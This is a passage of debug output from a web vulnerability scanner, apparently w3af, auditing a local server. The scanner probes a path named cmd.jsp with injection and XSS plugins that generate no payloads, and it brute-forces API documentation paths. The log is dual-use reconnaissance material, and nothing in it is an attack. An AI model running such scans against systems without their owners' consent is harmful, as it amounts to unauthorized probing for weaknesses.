uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:42 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jsp" () [Wed Feb 12 09:36:42 2020 - debug] generic.audit(did="foWf3wWD",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:42 2020 - debug] MKACTIVITY http://localhost:9090/ returned HTTP code "404" (id=559,from_cache=0,grep=1,rtt=0.09,did=EPAFw629) [Wed Feb 12 09:36:42 2020 - debug] allowed_methods.discover(did="a6QYZFNE",uri="http://localhost:9090/") took 24.26s to run [Wed Feb 12 09:36:42 2020 - debug] GET http://localhost:9090/wp-login.php returned HTTP code "404" (id=560,from_cache=1,grep=1,rtt=0.18,did=s7X3mNqs) [Wed Feb 12 09:36:42 2020 - debug] wordpress_fingerprint.discover(did="WqNZdGWv",uri="http://localhost:9090/learn") took 0.16s to run [Wed Feb 12 09:36:42 2020 - debug] format_string.audit(did="nvaWTkRU", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:42 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jsp" () [Wed Feb 12 09:36:42 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:nvaWTkRU) [Wed Feb 12 09:36:42 2020 - debug] websocket_hijacking.audit(did="Ee0kOT0F", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:42 2020 - debug] websocket_hijacking.audit(did="Ee0kOT0F",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:42 2020 - debug] format_string.audit(did="nvaWTkRU",uri="http://localhost:9090/cmd.jsp") took 0.02s to run [Wed Feb 12 09:36:42 2020 - debug] shell_shock.audit(did="RaLPsX4B", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:42 2020 - debug] memcachei.audit(did="JpmxUfJe", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:42 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jsp" () [Wed Feb 12 09:36:42 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:JpmxUfJe) [Wed Feb 12 09:36:42 2020 - debug] memcachei.audit(did="JpmxUfJe",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:42 2020 - debug] robots_txt.discover(http://localhost:9090/learn, did=KzhJG0kX) [Wed Feb 12 09:36:42 2020 - debug] [robots_txt] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:42 2020 - debug] archive_dot_org.discover(http://localhost:9090/learn, did=GYfYkGIL) [Wed Feb 12 09:36:42 2020 - debug] [archive_dot_org] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:42 2020 - debug] The crawl plugin: "robots_txt" wont be run anymore. [Wed Feb 12 09:36:42 2020 - debug] Starting CrawlInfra consumer _teardown() with 1 plugins [Wed Feb 12 09:36:42 2020 - debug] Calling robots_txt.end() [Wed Feb 12 09:36:42 2020 - debug] Spent 0.00 seconds running robots_txt.end() [Wed Feb 12 09:36:42 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:36:42 2020 - debug] robots_txt.discover(did="KzhJG0kX",uri="http://localhost:9090/learn") took 0.02s to run [Wed Feb 12 09:36:42 2020 - debug] ria_enumerator.discover(http://localhost:9090/learn, did=BzWWTPj5) [Wed Feb 12 09:36:42 2020 - debug] [ria_enumerator] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:42 2020 - debug] The crawl plugin: "ria_enumerator" wont be run anymore. [Wed Feb 12 09:36:42 2020 - debug] Starting CrawlInfra consumer _teardown() with 1 plugins [Wed Feb 12 09:36:42 2020 - debug] Calling ria_enumerator.end() [Wed Feb 12 09:36:42 2020 - debug] Spent 0.00 seconds running ria_enumerator.end() [Wed Feb 12 09:36:42 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:36:42 2020 - debug] ria_enumerator.discover(did="BzWWTPj5",uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:36:42 2020 - debug] un_ssl.audit(did="9z6xqBMP", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:42 2020 - debug] un_ssl.audit(did="9z6xqBMP",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:42 2020 - debug] ldapi.audit(did="V7n37BjZ", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:42 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jsp" () [Wed Feb 12 09:36:42 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:V7n37BjZ) [Wed Feb 12 09:36:42 2020 - debug] ldapi.audit(did="V7n37BjZ",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:42 2020 - debug] buffer_overflow.audit(did="rGoCrkJN", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:42 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jsp" () [Wed Feb 12 09:36:42 2020 - debug] redos.audit(did="dWoUbfty", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:42 2020 - debug] buffer_overflow.audit(did="rGoCrkJN",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:42 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jsp" () [Wed Feb 12 09:36:42 2020 - debug] GET http://localhost:9090/learn returned HTTP code "200" (id=561,from_cache=0,grep=1,rtt=0.02,did=3ZCxBbL7) [Wed Feb 12 09:36:42 2020 - information] The remote Web server has Content Negotiation disabled [Wed Feb 12 09:36:42 2020 - debug] content_negotiation.discover(did="dTu1ShAb",uri="http://localhost:9090/learn") took 0.23s to run [Wed Feb 12 09:36:42 2020 - debug] redos.audit(did="dWoUbfty",uri="http://localhost:9090/cmd.jsp") took 0.01s to run [Wed Feb 12 09:36:42 2020 - debug] global_redirect.audit(did="4e2ZpQIS", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:42 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jsp" () [Wed Feb 12 09:36:42 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:4e2ZpQIS) [Wed Feb 12 09:36:42 2020 - debug] wordnet.discover(http://localhost:9090/learn, did=veFKcUAf) [Wed Feb 12 09:36:42 2020 - debug] [wordnet] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:42 2020 - debug] user_dir.discover(http://localhost:9090/learn, did=JeK7xTzO) [Wed Feb 12 09:36:42 2020 - debug] [user_dir] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:42 2020 - debug] The crawl plugin: "user_dir" wont be run anymore. [Wed Feb 12 09:36:42 2020 - debug] Starting CrawlInfra consumer _teardown() with 1 plugins [Wed Feb 12 09:36:42 2020 - debug] Calling user_dir.end() [Wed Feb 12 09:36:42 2020 - debug] Spent 0.00 seconds running user_dir.end() [Wed Feb 12 09:36:42 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:36:42 2020 - debug] user_dir.discover(did="JeK7xTzO",uri="http://localhost:9090/learn") took 0.06s to run [Wed Feb 12 09:36:42 2020 - debug] xpath.audit(did="krqkeCAc", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:42 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jsp" () [Wed Feb 12 09:36:42 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:krqkeCAc) [Wed Feb 12 09:36:42 2020 - debug] sitemap_xml.discover(http://localhost:9090/learn, did=vBL4WbmB) [Wed Feb 12 09:36:42 2020 - debug] [sitemap_xml] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:42 2020 - debug] The crawl plugin: "sitemap_xml" wont be run anymore. [Wed Feb 12 09:36:42 2020 - debug] Starting CrawlInfra consumer _teardown() with 1 plugins [Wed Feb 12 09:36:42 2020 - debug] Calling sitemap_xml.end() [Wed Feb 12 09:36:42 2020 - debug] Spent 0.00 seconds running sitemap_xml.end() [Wed Feb 12 09:36:42 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:36:42 2020 - debug] sitemap_xml.discover(did="vBL4WbmB",uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:36:42 2020 - debug] cors_origin.audit(did="Ib68rQjp", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:42 2020 - debug] xpath.audit(did="krqkeCAc",uri="http://localhost:9090/cmd.jsp") took 0.08s to run [Wed Feb 12 09:36:42 2020 - debug] GET http://localhost:9090/cmd.jsp returned HTTP code "404" (id=562,from_cache=0,grep=1,rtt=0.10,did=RaLPsX4B) [Wed Feb 12 09:36:42 2020 - debug] htaccess_methods.audit(did="4qiIeOmP", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:42 2020 - debug] dir_file_bruter.discover(http://localhost:9090/learn, did=wwm2C286) [Wed Feb 12 09:36:42 2020 - debug] [dir_file_bruter] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:42 2020 - debug] The crawl plugin: "dir_file_bruter" wont be run anymore. [Wed Feb 12 09:36:42 2020 - debug] Starting CrawlInfra consumer _teardown() with 1 plugins [Wed Feb 12 09:36:42 2020 - debug] Calling dir_file_bruter.end() [Wed Feb 12 09:36:42 2020 - debug] dav.audit(did="e4zTbRvs", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:42 2020 - debug] dav.audit(did="e4zTbRvs",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:42 2020 - debug] ssi.audit(did="Dkctc4JD", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:42 2020 - debug] GET http://localhost:9090/learn returned HTTP code "200" (id=564,from_cache=1,grep=1,rtt=0.14,did=xC6ZlM2P) [Wed Feb 12 09:36:42 2020 - debug] xxe.audit(did="tx17N9hX", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:42 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jsp" () [Wed Feb 12 09:36:42 2020 - debug] xxe.audit(did="tx17N9hX",uri="http://localhost:9090/cmd.jsp") took 0.02s to run [Wed Feb 12 09:36:42 2020 - debug] GET http://www.bing.com/search?q=@localhost.&FORM=PERE&first=91 returned HTTP code "200" (id=563,from_cache=0,grep=0,rtt=0.53,did=Ow5uHmN2) [Wed Feb 12 09:36:42 2020 - debug] wordnet.discover(did="veFKcUAf",uri="http://localhost:9090/learn") took 0.31s to run [Wed Feb 12 09:36:42 2020 - debug] Spent 0.14 seconds running dir_file_bruter.end() [Wed Feb 12 09:36:42 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:36:42 2020 - debug] dir_file_bruter.discover(did="wwm2C286",uri="http://localhost:9090/learn") took 0.14s to run [Wed Feb 12 09:36:42 2020 - debug] find_dvcs.discover(http://localhost:9090/learn, did=MtUTmaiP) [Wed Feb 12 09:36:42 2020 - debug] [find_dvcs] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:42 2020 - debug] find_dvcs.discover(did="MtUTmaiP",uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:36:42 2020 - debug] import_results.discover(http://localhost:9090/learn, did=g4pFUFBu) [Wed Feb 12 09:36:42 2020 - debug] [import_results] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:42 2020 - debug] The crawl plugin: "import_results" wont be run anymore. [Wed Feb 12 09:36:42 2020 - debug] Starting CrawlInfra consumer _teardown() with 1 plugins [Wed Feb 12 09:36:42 2020 - debug] Calling import_results.end() [Wed Feb 12 09:36:42 2020 - debug] Spent 0.00 seconds running import_results.end() [Wed Feb 12 09:36:42 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:36:42 2020 - debug] import_results.discover(did="g4pFUFBu",uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:36:42 2020 - debug] global_redirect.audit(did="4e2ZpQIS",uri="http://localhost:9090/cmd.jsp") took 0.37s to run [Wed Feb 12 09:36:42 2020 - debug] eval.audit(did="2m3lAx9G", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:42 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jsp" () [Wed Feb 12 09:36:42 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:2m3lAx9G) [Wed Feb 12 09:36:42 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jsp" () [Wed Feb 12 09:36:42 2020 - debug] rosetta_flash.audit(did="einxzueA", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:42 2020 - debug] rosetta_flash.audit(did="einxzueA",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:42 2020 - debug] GET http://localhost:9090/cmd.jsp returned HTTP code "404" (id=565,from_cache=0,grep=1,rtt=0.11,did=Ib68rQjp) [Wed Feb 12 09:36:42 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 327, 'reject-seen-url': 71, 'reject-out-of-scope': 5, 'accept': 72} [Wed Feb 12 09:36:42 2020 - debug] phpinfo.discover(http://localhost:9090/learn, did=T0N2VEkL) [Wed Feb 12 09:36:42 2020 - debug] [phpinfo] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:42 2020 - debug] phpinfo.discover(did="T0N2VEkL",uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:36:42 2020 - debug] url_fuzzer.discover(http://localhost:9090/learn, did=yrCsPE8F) [Wed Feb 12 09:36:42 2020 - debug] [url_fuzzer] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:42 2020 - debug] xss.audit(did="FlEdi4dL", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:42 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jsp" () [Wed Feb 12 09:36:42 2020 - debug] xss.audit(did="FlEdi4dL",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:42 2020 - debug] GET http://localhost:9090/cmd.jsp returned HTTP code "404" (id=566,from_cache=1,grep=1,rtt=0.17,did=Bp7fF9pB) [Wed Feb 12 09:36:42 2020 - debug] htaccess_methods.audit(did="4qiIeOmP",uri="http://localhost:9090/cmd.jsp") took 0.35s to run [Wed Feb 12 09:36:42 2020 - debug] payment_webhook_finder.discover(http://localhost:9090/learn, did=KN5VN6NG) [Wed Feb 12 09:36:42 2020 - debug] [payment_webhook_finder] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:42 2020 - debug] xst.audit(did="2jaiAToi", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:42 2020 - debug] xst.audit(did="2jaiAToi",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:42 2020 - debug] localhost:9090 connection pool stats (free:46 / in_use:4 / max:50 / total:50) [Wed Feb 12 09:36:42 2020 - debug] Connections with more in use time: (e5d18847cda1e1ee, 0.25 sec) (26cc3d3a49e28508, 0.23 sec) (955b76b517b2a7f0, 0.02 sec) (ee57bf4e9093aa89, 0.01 sec) [Wed Feb 12 09:36:42 2020 - debug] GET http://localhost:9090/cmd.jsp returned HTTP code "404" (id=567,from_cache=0,grep=0,rtt=0.03,did=RaLPsX4B) [Wed Feb 12 09:36:42 2020 - debug] eval.audit(did="2m3lAx9G",uri="http://localhost:9090/cmd.jsp") took 0.38s to run [Wed Feb 12 09:36:42 2020 - debug] GET http://localhost:9090/openapi.json returned HTTP code "404" (id=569,from_cache=0,grep=1,rtt=0.19,did=c0UiZ8h7) [Wed Feb 12 09:36:42 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jsp" () [Wed Feb 12 09:36:42 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:Dkctc4JD) [Wed Feb 12 09:36:43 2020 - debug] ssi.audit(did="Dkctc4JD",uri="http://localhost:9090/cmd.jsp") took 0.67s to run [Wed Feb 12 09:36:43 2020 - debug] GET http://localhost:9090/cmd.jsp returned HTTP code "404" (id=568,from_cache=0,grep=1,rtt=0.13,did=Ib68rQjp) [Wed Feb 12 09:36:43 2020 - debug] cors_origin.audit(did="Ib68rQjp",uri="http://localhost:9090/cmd.jsp") took 0.83s to run (0.24s 28% sending HTTP requests) [Wed Feb 12 09:36:43 2020 - debug] GET http://localhost:9090/api/v1/swagger.json returned HTTP code "404" (id=574,from_cache=0,grep=1,rtt=0.20,did=c0UiZ8h7) [Wed Feb 12 09:36:43 2020 - debug] ssl_certificate.audit(did="5R1OD6SV", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:43 2020 - debug] ssl_certificate.audit(did="5R1OD6SV",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:43 2020 - debug] GET http://localhost:9090/api/openapi.json returned HTTP code "404" (id=570,from_cache=0,grep=1,rtt=0.30,did=c0UiZ8h7) [Wed Feb 12 09:36:43 2020 - debug] GET http://localhost:9090/api/v1.0/openapi.yaml returned HTTP code "404" (id=577,from_cache=0,grep=1,rtt=0.12,did=c0UiZ8h7) [Wed Feb 12 09:36:43 2020 - debug] preg_replace.audit(did="NGllkMiq", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:43 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jsp" () [Wed Feb 12 09:36:43 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:NGllkMiq) [Wed Feb 12 09:36:43 2020 - debug] preg_replace.audit(did="NGllkMiq",uri="http://localhost:9090/cmd.jsp") took 0.01s to run [Wed Feb 12 09:36:43 2020 - debug] GET http://localhost:9090/api/v1/openapi.yaml returned HTTP code "404" (id=580,from_cache=0,grep=1,rtt=0.32,did=c0UiZ8h7) [Wed Feb 12 09:36:43 2020 - debug] GET http://localhost:9090/api/v2.0/openapi.yaml returned HTTP code "404" (id=573,from_cache=0,grep=1,rtt=0.16,did=c0UiZ8h7) [Wed Feb 12 09:36:43 2020 - debug] GET http://localhost:9090/openapi.yaml returned HTTP code "404" (id=572,from_cache=0,grep=1,rtt=0.07,did=c0UiZ8h7) [Wed Feb 12 09:36:43 2020 - debug] GET http://localhost:9090/api/v2.1/openapi.yaml returned HTTP code "404" (id=578,from_cache=0,grep=1,rtt=0.22,did=c0UiZ8h7) [Wed Feb 12 09:36:43 2020 - debug] GET http://localhost:9090/api/v2.1/swagger.json returned HTTP code "404" (id=586,from_cache=0,grep=1,rtt=0.18,did=c0UiZ8h7) [Wed Feb 12 09:36:44 2020 - debug] GET http://localhost:9090/api/v1/openapi.json returned HTTP code "404" (id=576,from_cache=0,grep=1,rtt=0.22,did=c0UiZ8h7) [Wed Feb 12 09:36:44 2020 - debug] GET http://localhost:9090/api/2.1/swagger.json returned HTTP code "404" (id=587,from_cache=0,grep=1,rtt=0.40,did=c0UiZ8h7) [Wed Feb 12 09:36:44 2020 - debug] GET http://localhost:9090/api/openapi.yaml returned HTTP code "404" (id=571,from_cache=0,grep=1,rtt=0.05,did=c0UiZ8h7) [Wed Feb 12 09:36:44 2020 - debug] GET http://localhost:9090/api/v2.1/openapi.json returned HTTP code "404" (id=581,from_cache=0,grep=1,rtt=0.14,did=c0UiZ8h7) [Wed Feb 12 09:36:44 2020 - debug] GET http://localhost:9090/api/swagger.json returned HTTP code "404" (id=585,from_cache=0,grep=1,rtt=0.18,did=c0UiZ8h7) [Wed Feb 12 09:36:44 2020 - debug] GET http://localhost:9090/swagger.json returned HTTP code "404" (id=582,from_cache=0,grep=1,rtt=0.63,did=c0UiZ8h7) [Wed Feb 12 09:36:44 2020 - debug] GET http://localhost:9090/api/v2.0/openapi.json returned HTTP code "404" (id=584,from_cache=0,grep=1,rtt=0.37,did=c0UiZ8h7) [Wed Feb 12 09:36:44 2020 - debug] GET http://localhost:9090/api/v2.0/swagger.json returned HTTP code "404" (id=575,from_cache=0,grep=1,rtt=0.20,did=c0UiZ8h7) [Wed Feb 12 09:36:44 2020 - debug] GET http://localhost:9090/api/v2/openapi.json returned HTTP code "404" (id=588,from_cache=0,grep=1,rtt=0.18,did=c0UiZ8h7) [Wed Feb 12 09:36:44 2020 - debug] GET http://localhost:9090/api/2.1/openapi.json returned HTTP code "404" (id=590,from_cache=0,grep=1,rtt=0.23,did=c0UiZ8h7) [Wed Feb 12 09:36:44 2020 - debug] mx_injection.audit(did="u6EhIilW", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:44 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jsp" () [Wed Feb 12 09:36:44 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:u6EhIilW) [Wed Feb 12 09:36:44 2020 - debug] GET http://localhost:9090/api/v1.1/openapi.json returned HTTP code "404" (id=579,from_cache=0,grep=1,rtt=0.04,did=c0UiZ8h7) [Wed Feb 12 09:36:44 2020 - debug] GET http://localhost:9090/api/v2/openapi.yaml returned HTTP code "404" (id=589,from_cache=0,grep=1,rtt=0.20,did=c0UiZ8h7) [Wed Feb 12 09:36:44 2020 - debug] GET http://localhost:9090/api/v1.0/openapi.json returned HTTP code "404" (id=592,from_cache=0,grep=1,rtt=0.58,did=c0UiZ8h7) [Wed Feb 12 09:36:44 2020 - debug] GET http://localhost:9090/api/v1.1/openapi.yaml returned HTTP code "404" (id=593,from_cache=0,grep=1,rtt=0.16,did=c0UiZ8h7) [Wed Feb 12 09:36:44 2020 - debug] GET http://localhost:9090/api/v2/swagger.json returned HTTP code "404" (id=583,from_cache=0,grep=1,rtt=0.22,did=c0UiZ8h7) [Wed Feb 12 09:36:44 2020 - debug] mx_injection.audit(did="u6EhIilW",uri="http://localhost:9090/cmd.jsp") took 0.13s to run [Wed Feb 12 09:36:44 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 41. [Wed Feb 12 09:36:44 2020 - debug] GET http://localhost:9090/api/v1.0/swagger.json returned HTTP code "404" (id=594,from_cache=0,grep=1,rtt=0.28,did=c0UiZ8h7) [Wed Feb 12 09:36:44 2020 - debug] GET http://localhost:9090/api/2.0/openapi.json returned HTTP code "404" (id=595,from_cache=0,grep=1,rtt=0.27,did=c0UiZ8h7) [Wed Feb 12 09:36:44 2020 - debug] GET http://localhost:9090/cmd.jsp returned HTTP code "404" (id=596,from_cache=0,grep=0,rtt=0.32,did=RaLPsX4B) [Wed Feb 12 09:36:44 2020 - debug] GET http://localhost:9090/api/v1.1/swagger.json returned HTTP code "404" (id=591,from_cache=0,grep=1,rtt=0.39,did=c0UiZ8h7) [Wed Feb 12 09:36:44 2020 - debug] GET http://localhost:9090/api/2.0/swagger.json returned HTTP code "404" (id=597,from_cache=0,grep=1,rtt=0.35,did=c0UiZ8h7) [Wed Feb 12 09:36:44 2020 - debug] response_splitting.audit(did="uscrxtD1", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:44 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jsp" () [Wed Feb 12 09:36:44 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:uscrxtD1) [Wed Feb 12 09:36:44 2020 - debug] localhost:9090 connection pool stats (free:48 / in_use:2 / max:50 / total:50) [Wed Feb 12 09:36:44 2020 - debug] Connections with more in use time: (f5adb0c09c70ca09, 0.28 sec) (7b389725bee04a75, 0.03 sec) [Wed Feb 12 09:36:44 2020 - debug] response_splitting.audit(did="uscrxtD1",uri="http://localhost:9090/cmd.jsp") took 0.10s to run [Wed Feb 12 09:36:44 2020 - debug] rfd.audit(did="WPEeAPs4", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:44 2020 - debug] URL "http://localhost:9090/cmd.jsp" is not vulnerable to RFD because response content-type is "text/html" and content-disposition header is missing, response id 557 [Wed Feb 12 09:36:44 2020 - debug] rfd.audit(did="WPEeAPs4",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:44 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 42. [Wed Feb 12 09:36:44 2020 - debug] rfi.audit(did="E1BOW4I3", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:44 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jsp" () [Wed Feb 12 09:36:44 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:E1BOW4I3) [Wed Feb 12 09:36:44 2020 - debug] frontpage.audit(did="mIA7Gud9", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:44 2020 - debug] RFI using local web server for URL: http://localhost:9090/cmd.jsp [Wed Feb 12 09:36:44 2020 - debug] frontpage.audit(did="mIA7Gud9",uri="http://localhost:9090/cmd.jsp") took 0.10s to run [Wed Feb 12 09:36:44 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 43. [Wed Feb 12 09:36:44 2020 - debug] GET http://localhost:9090/api/2.1/openapi.yaml returned HTTP code "404" (id=598,from_cache=0,grep=1,rtt=0.16,did=c0UiZ8h7) [Wed Feb 12 09:36:44 2020 - debug] GET http://localhost:9090/api/1.0/openapi.json returned HTTP code "404" (id=599,from_cache=0,grep=1,rtt=0.14,did=c0UiZ8h7) [Wed Feb 12 09:36:44 2020 - debug] GET http://localhost:9090/learn returned HTTP code "200" (id=602,from_cache=0,grep=1,rtt=0.18,did=iVy6luZ0) [Wed Feb 12 09:36:44 2020 - debug] GET http://localhost:9090/api/1.1/swagger.json returned HTTP code "404" (id=604,from_cache=0,grep=1,rtt=0.04,did=c0UiZ8h7) [Wed Feb 12 09:36:44 2020 - debug] GET http://localhost:9090/api/1.1/openapi.yaml returned HTTP code "404" (id=603,from_cache=0,grep=1,rtt=0.15,did=c0UiZ8h7) [Wed Feb 12 09:36:44 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 44. [Wed Feb 12 09:36:44 2020 - debug] GET http://localhost:9090/api/2.0/openapi.yaml returned HTTP code "404" (id=600,from_cache=0,grep=1,rtt=0.39,did=c0UiZ8h7) [Wed Feb 12 09:36:44 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 45. [Wed Feb 12 09:36:44 2020 - debug] GET http://localhost:9090/api/1.1/openapi.json returned HTTP code "404" (id=605,from_cache=0,grep=1,rtt=0.10,did=c0UiZ8h7) [Wed Feb 12 09:36:44 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jsp" () [Wed Feb 12 09:36:44 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:E1BOW4I3) [Wed Feb 12 09:36:44 2020 - debug] Updating socket timeout for localhost from 3.99 to 3.00 seconds [Wed Feb 12 09:36:44 2020 - debug] rfi.audit(did="E1BOW4I3",uri="http://localhost:9090/cmd.jsp") took 0.39s to run [Wed Feb 12 09:36:44 2020 - debug] GET http://localhost:9090/cmd.jsp returned HTTP code "404" (id=606,from_cache=0,grep=0,rtt=0.13,did=RaLPsX4B) [Wed Feb 12 09:36:44 2020 - debug] Returning cached average RTT of 0.16 seconds for mutant e6f3b5641a7c325c0e44e6e7e6ee2ac8 [Wed Feb 12 09:36:44 2020 - debug] GET http://localhost:9090/api/1.0/openapi.yaml returned HTTP code "404" (id=608,from_cache=0,grep=1,rtt=0.22,did=c0UiZ8h7) [Wed Feb 12 09:36:44 2020 - debug] GET http://web.archive.org/web/*/http:/localhost:9090/learn returned HTTP code "200" (id=609,from_cache=0,grep=1,rtt=1.95,did=L0OEkg4A) [Wed Feb 12 09:36:44 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 46. [Wed Feb 12 09:36:44 2020 - debug] Returning fresh average RTT of 0.16 seconds for mutant e6f3b5641a7c325c0e44e6e7e6ee2ac8 [Wed Feb 12 09:36:44 2020 - debug] GET http://www.bing.com/search?q=@localhost.&FORM=PERE&first=101 returned HTTP code "200" (id=607,from_cache=0,grep=0,rtt=0.85,did=AvYJePGW) [Wed Feb 12 09:36:44 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 47. [Wed Feb 12 09:36:45 2020 - debug] GET http://localhost:9090/learn.tgz returned HTTP code "404" (id=611,from_cache=0,grep=1,rtt=0.13,did=FWes7cbV) [Wed Feb 12 09:36:45 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 48. [Wed Feb 12 09:36:45 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 49. [Wed Feb 12 09:36:45 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 50. [Wed Feb 12 09:36:45 2020 - debug] GET http://localhost:9090/learn~ returned HTTP code "404" (id=610,from_cache=0,grep=1,rtt=0.12,did=WWt6q4f8) [Wed Feb 12 09:36:45 2020 - debug] GET 